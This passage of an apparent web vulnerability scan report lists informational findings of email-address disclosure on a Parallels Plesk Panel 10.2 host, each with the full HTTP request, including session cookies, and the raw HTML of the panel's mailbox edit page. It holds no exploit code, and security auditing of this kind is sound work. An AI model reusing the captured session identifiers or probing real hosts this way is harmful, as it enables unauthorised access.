<script type='text/javascript'>
Jsw.onReady(function() {
new Smb.Views.EmailFormAjax({
applyTo: 'form-emailaddress',
waitButtonTitle: 'Please wait'
});
});
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

11.2. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/edit/id/2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/email-address/edit/id/2

Issue detail

The following email address was disclosed in the response:

Request

GET /smb/email-address/edit/id/2 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/email-address/list
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:30:02 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:30:02 GMT
Connection: close
Content-Length: 36392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="3e86204e9517123c7f585d736d64aa3f" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/smb/scripts/components/forms/emailaddress.js?1302230704"></script>
<title>fdf080d9224fd0d18957a62c@vulnerable.host.fqdn - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/email-address/action-name/edit" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Femail-address%2Fedit%2Fid%2F2' + '&activeModule=' + 'mail' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"active","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading no-border">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb/email-address/index">
<span>Up Level</span>
</a>
</div>
<h2><span><b>fdf080d9224fd0d18957a62c@vulnerable.host.fqdn</b></span></h2>
</div>
</div>


<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> The user account was not found. This could happen if the user account was removed by someone else while you were changing its settings. </div>
</div></div></div></div></div></div>
<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>


<div id="content-body" class="clearfix">
<div id="main">

<form id="form-emailaddress" enctype="application/x-www-form-urlencoded" action="" method="post"><div id='form-tab-buttons' class='tabs'></div><script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.bar.Tabs({
type: 'dynamic',
applyTo: 'form-tab-buttons',
items: [{"componentType":"Jsw.bar.Button","title":"General","tabId":"tab-general","containerCls":"active"},{"componentType":"Jsw.bar.Button","title":"Forwarding","tabId":"tab-redirect","containerCls":""},{"componentType":"Jsw.bar.Button","title":"E-mail Aliases","tabId":"tab-aliases","containerCls":""},{"componentType":"Jsw.bar.Button","title":"Auto-Reply","tabId":"tab-autoResponder","containerCls":""},{"componentType":"Jsw.bar.Button","title":"Antivirus","tabId":"tab-antivirus","containerCls":""}]
});
});
</script>

<div id='tab-general' ><p>Set up a mailbox and specify a password for accessing it.</p>

<div id='general-generalSection' class='form-box' >
<div id='general-generalSection-content-area'>

<div class='form-row'>
<div class='field-name'>
<label for='general-generalSection-name'>E-mail address&nbsp;<span class="required">*</span></label> </div>
<div class='field-value'>
<span>

<input type="text" name="general[generalSection][name]" id="general-generalSection-name" value="fdf080d9224fd0d18957a62c" class="input-text" />@vulnerable.host.fqdn </span>
<span class="field-errors" style="display: none;"></span>
</div>
</div>

<div class="form-row">
<div class="field-name">

<input type="hidden" name="general[generalSection][postbox]" value="0" /><input type="checkbox" name="general[generalSection][postbox]" id="general-generalSection-postbox" value="1" checked="checked" class="checkbox" /> <label for='general-generalSection-postbox'>Mailbox&nbsp;</label> </div>
<div class="field-value">
<div class="text-value">

<input type="hidden" name="general[generalSection][mboxQuotaValue]" value="-1" id="general-generalSection-mboxQuotaValue" /> <span><label>
<input type="radio" class="radio" value="unlimited"
id="general-generalSection-mboxQuotaValue-default"
name="general-generalSection-mboxQuotaValue-selector"
checked="checked" />
Set the mailbox size as defined by the service provider (100 MB) </label>
</span><br />
<span><label>
<input type="radio" class="radio" value="specific"
id="general-generalSection-mboxQuotaValue-specific"
name="general-generalSection-mboxQuotaValue-selector"
/>
Specify new size </label>
<input type="text" class="input-text" size="10"
value=""
id="general-generalSection-mboxQuotaValue-specific-input"
>
<select id="general-generalSection-mboxQuotaValue-specific-multiplier">
<option value="1024" selected="selected" >
KB </option>
<option value="1048576" >
MB </option>
</select>
</span><br />
<span style="display: none;" class="field-errors"></span>
</div>
</div>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {

   var updateElementStatusFunction = function() {
var postboxEnabled = $('general-generalSection-postbox').checked;
$('general-generalSection-mboxQuotaValue-default').disabled = !postboxEnabled;
$('general-generalSection-mboxQuotaValue-specific').disabled = !postboxEnabled;
$('general-generalSection-mboxQuotaValue-specific-input').disabled =
! postboxEnabled ||
! $('general-generalSection-mboxQuotaValue-specific').checked;
$('general-generalSection-mboxQuotaValue-specific-multiplier').disabled =
! postboxEnabled ||
! $('general-generalSection-mboxQuotaValue-specific').checked;
if (postboxEnabled && $('general-generalSection-mboxQuotaValue-specific').checked) {
$('general-generalSection-mboxQuotaValue-specific-input').focus();
}
updateElementValueFunction();
   };

var updateElementValueFunction = function() {
if (!$('general-generalSection-postbox').checked) {
return;
}

var value = 'error';
if ($('general-generalSection-mboxQuotaValue-default').checked) {
   value = -1;
} else {
   var input = $('general-generalSection-mboxQuotaValue-specific-input').value;
   var integerTest = /^\d+$/;
   if (integerTest.test(input)) {
var multiplier = $('general-generalSection-mboxQuotaValue-specific-multiplier').value;
value = input * multiplier;
   }
}
$('general-generalSection-mboxQuotaValue').value = value;
};

if ($('general-generalSection-postbox')) {
   updateElementStatusFunction();
$('general-generalSection-postbox').observe('click', updateElementStatusFunction);
$('general-generalSection-mboxQuotaValue-default').observe('click', updateElementStatusFunction);
$('general-generalSection-mboxQuotaValue-specific').observe('click', updateElementStatusFunction);
$('general-generalSection-mboxQuotaValue-specific-input').observe('change', updateElementValueFunction);
$('general-generalSection-mboxQuotaValue-specific-multiplier').observe('change', updateElementValueFunction);
}
});
//]]>
</script>


<div class='form-row'>
<div class='field-name'><label for='general-generalSection-userId'>Assigned to&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-generalSection-userId'>format-1</span>

</div>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'general-generalSection'
});
});
//]]>
</script>
</div>
<div id='tab-redirect' style="display: none;"><p>Set up forwarding of e-mail messages to one or several e-mail addresses. If your mailbox is switched on under the General tab, then copies of e-mail messages will be kept in it.</p>

<div id='redirect-redirectSection' class='form-box' >
<div id='redirect-redirectSection-content-area'>
<div class='form-row'>
<div class='single-row'>

<input type="hidden" name="redirect[redirectSection][enabled]" value="0" /><input type="checkbox" name="redirect[redirectSection][enabled]" id="redirect-redirectSection-enabled" value="1" class="checkbox" />
<label for='redirect-redirectSection-enabled'>Switch on mail forwarding&nbsp;</label>

<span style='display: none;' class='field-errors'></span>
</div>
</div>
<div id='redirect-redirectSection-subscribers-form-row' class='form-row' >
<div class='field-name'><label for='redirect-redirectSection-subscribers'>Forward incoming messages to the following e-mail address&nbsp;</label></div>
<div class='field-value'>

<textarea name="redirect[redirectSection][subscribers]" id="redirect-redirectSection-subscribers" class="f-middle-size" rows="10" cols="80"></textarea>
<span class='field-errors' style="display:none;"></span>
<span class="hint">Specify e-mail addresses. You can type each address on a new line, or separate addresses with white spaces, commas, and semicolons.</span>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'redirect-redirectSection'
});
});
//]]>
</script>
</div>
<div id='tab-aliases' style="display: none;">
<tr>
<td colspan='2'>
<p class="" escape="">E-mail aliases are alternative e-mail addresses associated with a primary e-mail address. All mail sent to e-mail aliases will be received by the primary e-mail address.</p></td>
</tr>

<div id='aliases-aliasesSection' class='form-box' >
<div id='aliases-aliasesSection-content-area'>
<div id="aliasesForm">

<div class="dynamicSubFormTemplate" style="display: none;">
<div id='aliases-aliasesSection-aliasesForm-dynamicSubFormTemplate-aliasName-form-row' class='form-row' >
<div class='field-name'><label for='aliases-aliasesSection-aliasesForm-dynamicSubFormTemplate-aliasName'>E-mail alias&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="aliases[aliasesSection][aliasesForm][dynamicSubFormTemplate][aliasName]" id="aliases-aliasesSection-aliasesForm-dynamicSubFormTemplate-aliasName" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
<div id='aliases-aliasesSection-aliasesForm-buttonAddAlias-form-row' class='form-row' >
<div class='field-name'><label for='aliases-aliasesSection-aliasesForm-buttonAddAlias'>E-mail alias&nbsp;</label></div>
<div class='field-value'>

<a class="s-btn sb-item-add dynamicSubFormContentAddButton" id="aliases-aliasesSection-aliasesForm-buttonAddAlias"></a>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
<script type="text/javascript">
//<![CDATA[
Smb.AliasesDynamicSubForm = Class.create(Smb.DynamicSubForm, {
_onInitDynamic: function($super) {
$super();
this.domainNameFieldId = 'general-generalSection-domain';

if (!$('general-generalSection-domain')) {
// for my profile
this.domainNameFieldId = 'general-vcard-domain';
}

if ($(this.domainNameFieldId)) {
var context = this;
$(this.domainNameFieldId).observe('change', function() {context.onDomainChange();});
}
this.onDomainChange();
},

_isAddButtonDisabled: function() {
var isAddAliasButtonDisabled = false;
try {
isAddAliasButtonDisabled = Smb.Views.User.isExternalMailUsed();
} catch (e) { }
return isAddAliasButtonDisabled
},

_bindDynamicContent: function($super, content, isFirstElement) {
var domainElement = new Element('span', {'class' : 'aliasDomainName'});
content.select('.field-value input').last().insert({after: domainElement});
return $super(content, isFirstElement);
},

_initRemoveButtonWrapper: function(content) {
var wrapperId = this._removeButtonId + '-' + this._getRandomNumber();
content.select('.aliasDomainName').last().insert({
after: '<span id="' + wrapperId + '" class="' + this._removeButtonId + '"></span>'
});
return wrapperId;
},

_onUpdateDynamic: function($super) {
$super();
this.onDomainChange();
},

onDomainChange: function() {
var childs = this._componentElement.select('.aliasDomainName');
var domainName = this.getDomainName();
childs.each(function(child) {
child.update(' @' + domainName);
});
},

getDomainName: function() {
var domainName = 'vulnerable.host.fqdn';
if (!domainName) {
if (this.domainNameFieldId == 'general-vcard-domain') {
domainName = $(this.domainNameFieldId).value;
} else {
var index = $(this.domainNameFieldId).selectedIndex;
domainName = $(this.domainNameFieldId).options[index].text;
}
}
return domainName;
}
});

Jsw.onReady(function() {
new Smb.AliasesDynamicSubForm({
applyTo: 'aliasesForm',
addButtonId: 'aliases-aliasesSection-aliasesForm-buttonAddAlias',
addButtonTitle: 'Add e-mail alias',
removeButtonId: 'remove-alias-button-wrapper',
removeButtonTitle: 'Remove' });
});
//]]>
</script>
</div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'aliases-aliasesSection'
});
});
//]]>
</script>
</div>
<div id='tab-autoResponder' style="display: none;"><p>Set up an automatic response to any mail message coming to your e-mail address. Auto-reply is a standard means to notify your correspondents that you are out of office or on vacation.</p>

<div id='autoResponder-autoResponderSection' class='form-box' >
<div id='autoResponder-autoResponderSection-content-area'>
<div class='form-row'>
<div class='single-row'>

<input type="hidden" name="autoResponder[autoResponderSection][enabled]" value="0" /><input type="checkbox" name="autoResponder[autoResponderSection][enabled]" id="autoResponder-autoResponderSection-enabled" value="1" class="checkbox" />
<label for='autoResponder-autoResponderSection-enabled'>Switch on auto-reply&nbsp;</label>

<span style='display: none;' class='field-errors'></span>
</div>
</div>
<div id='autoResponder-autoResponderSection-subject-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-subject'>Auto-reply message subject&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="text" name="autoResponder[autoResponderSection][subject]" id="autoResponder-autoResponderSection-subject" value="Re: &lt;request_subject&gt;" class="f-large-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='autoResponder-autoResponderSection-contentType-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-contentType'>Message format&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<label for="autoResponder-autoResponderSection-contentType-false"><input type="radio" name="autoResponder[autoResponderSection][contentType]" id="autoResponder-autoResponderSection-contentType-false" value="false" checked="checked" class="radio" />Plain text</label><br /><label for="autoResponder-autoResponderSection-contentType-true"><input type="radio" name="autoResponder[autoResponderSection][contentType]" id="autoResponder-autoResponderSection-contentType-true" value="true" class="radio" />HTML</label></div>
<span class='field-errors' style="display:none;"></span>
<span class="hint">Plain text format is supported by all mail client programs, therefore, all recipients will see the message in the same way as you see it. HTML messages look better because they let you enter formatted text with different font styles. However, some mail clients do not support HTML messages and some of recipients may not see the formatted text.</span>
</div>
</div>
<div id='autoResponder-autoResponderSection-message-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-message'>Auto-reply message text&nbsp;</label></div>
<div class='field-value'>

<textarea name="autoResponder[autoResponderSection][message]" id="autoResponder-autoResponderSection-message" cols="50" rows="6" class="f-large-size"></textarea>
<span class='field-errors' style="display:none;"></span>
<span class="hint">Plain text only, no HTML is allowed. All tags will be ignored.</span>
</div>
</div>
<div id='autoResponder-autoResponderSection-forwardAddress-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-forwardAddress'>Forward to&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="autoResponder[autoResponderSection][forwardAddress]" id="autoResponder-autoResponderSection-forwardAddress" value="" class="f-large-size input-text" />
<span class='field-errors' style="display:none;"></span>
<span class="hint">When the automatic response is sent, the original message will be forwarded to the specified e-mail address.</span>
</div>
</div>
<div id="attachments">

<div class="dynamicSubFormTemplate" style="display: none;">
<div id='autoResponder-autoResponderSection-attachments-dynamicSubFormTemplate-file-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-attachments-dynamicSubFormTemplate-file'>Attach a file&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="autoResponder[autoResponderSection][attachments][dynamicSubFormTemplate][file]" id="autoResponder-autoResponderSection-attachments-dynamicSubFormTemplate-file" value="" style="display: none;" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
<div id='autoResponder-autoResponderSection-attachments-buttonAddAttachment-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-attachments-buttonAddAttachment'>Attach a file&nbsp;</label></div>
<div class='field-value'>

<a class="s-btn sb-item-add dynamicSubFormContentAddButton" id="autoResponder-autoResponderSection-attachments-buttonAddAttachment"></a>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
<script type="text/javascript">
//<![CDATA[
Smb.ResponderAttachmentDynamicSubForm = Class.create(Smb.DynamicSubForm, {
_bindDynamicContent: function($super, content, isFirstElement) {
$super(content, false);
content.select('input').each(function(input) {
if (input.value) {
var element = new Element('div', {'class': 'text-value'});
input.up('.field-value').insert({top: element});
input.up('.field-value').select('input, .remove-responder-attachment-button-wrapper').each(function(item) {
if (item != element) {
element.insert(item);
}
});
   input.insert({after: input.value});
} else {
input.replace(new Element('input', {
type: 'file',
id: input.id,
name: input.name
}));
}
});
}
});

Jsw.onReady(function() {
new Smb.ResponderAttachmentDynamicSubForm({
applyTo: 'attachments',
addButtonId: 'autoResponder-autoResponderSection-attachments-buttonAddAttachment',
addButtonTitle: 'Add new attachment',
removeButtonId: 'remove-responder-attachment-button-wrapper',
removeButtonTitle: 'Remove' });
});
//]]>
</script></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'autoResponder-autoResponderSection'
});
});
//]]>
</script>
</div>
<div id='tab-antivirus' style="display: none;">
<tr>
<td colspan='2'>
<p class="" escape="">Antivirus service blocks e-mail messages that contain viruses and notifies both the sender and the recipient about it.</p></td>
</tr>

<div id='antivirus-antivirusSection' class='form-box' >
<div id='antivirus-antivirusSection-content-area'>
<div class='form-row'>
<div class='single-row'>

<input type="hidden" name="antivirus[antivirusSection][enabled]" value="0" /><input type="checkbox" name="antivirus[antivirusSection][enabled]" id="antivirus-antivirusSection-enabled" value="1" class="checkbox" />
<label for='antivirus-antivirusSection-enabled'>Switch on antivirus protection for this e-mail address&nbsp;</label>

<span style='display: none;' class='field-errors'></span>
</div>
</div>
<div class="form-row">

<div class="field-name">
<label for="antivirus-antivirusSection-antivirusSettings">
Check for viruses </label>
</div>

<div class="field-value">
<div class="text-value">

<div class="indent-box">
<input type="radio"
value="incoming"
id="antivirus-antivirusSection-antivirusSettings-incoming"
class="radio"
name="antivirus[antivirusSection][antivirusSettings]"
checked="checked" />
<div class="indent-box-content">
<label for="antivirus-antivirusSection-antivirusSettings-incoming">
only incoming mail </label>
</div>
</div>


<div class="indent-box">
<input type="radio"
value="outgoing"
id="antivirus-antivirusSection-antivirusSettings-outgoing"
class="radio"
name="antivirus[antivirusSection][antivirusSettings]"
/>
<div class="indent-box-content">
<label for="antivirus-antivirusSection-antivirusSettings-outgoing">
only outgoing mail </label>
</div>
</div>


<div class="indent-box">
<input type="radio"
value="both"
id="antivirus-antivirusSection-antivirusSettings-both"
class="radio"
name="antivirus[antivirusSection][antivirusSettings]"
/>
<div class="indent-box-content">
<label for="antivirus-antivirusSection-antivirusSettings-both">
incoming and outgoing mail </label>
</div>
</div>

</div>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'antivirus-antivirusSection'
});
});
//]]>
</script>
</div>

<div class="btns-box">
<div class="box-area">
<div class="form-row">
<div class="field-name">
<span class="required">*</span>
Required fields </div>
<div class="field-value">

<span id='btn-send' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-send',
title: 'OK',
cls: 'btn',
name: 'send',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.submit(this); }
});
});
</script>

<span id='btn-cancel' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-cancel',
title: 'Cancel',
cls: 'btn',
name: 'cancel',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.redirect("/email-address/index"); }
});
});
</script>

<input type="hidden" name="hidden" value="" id="hidden" />
<!-- ability to submit form via Enter -->
<input type="image" src="/skins/default/img/blank.gif" style="border: 0; height: 0; width: 0; position: absolute;" />
</div>
</div>
</div>
</div>

<input type="hidden" name="forgery_protection_token" value="3e86204e9517123c7f585d736d64aa3f" id="form_forgery_protection_token" /></form>

<script type='text/javascript'>
Jsw.onReady(function() {
new Smb.Views.EmailFormAjax({
applyTo: 'form-emailaddress',
waitButtonTitle: 'Please wait'
});
});
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

11.3. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/edit/id/4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/email-address/edit/id/4

Issue detail

The following email address was disclosed in the response:

Request

GET /smb/email-address/edit/id/4 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/email-address/list
Cookie: PLESKSESSID=d8ef408a62e3c0d46c9effc4a0828d66; locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:52:19 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:52:19 GMT
Connection: close
Content-Length: 38577

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="bdaafe67daaa200e2f077bd9577b09f4" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/smb/scripts/components/forms/emailaddress.js?1302230704"></script>
<title>format-2@nosedivesailing.com - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/email-address/action-name/edit" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Femail-address%2Fedit%2Fid%2F4' + '&activeModule=' + 'mail' }
});
});
//]]>
</script> </div>
</div>
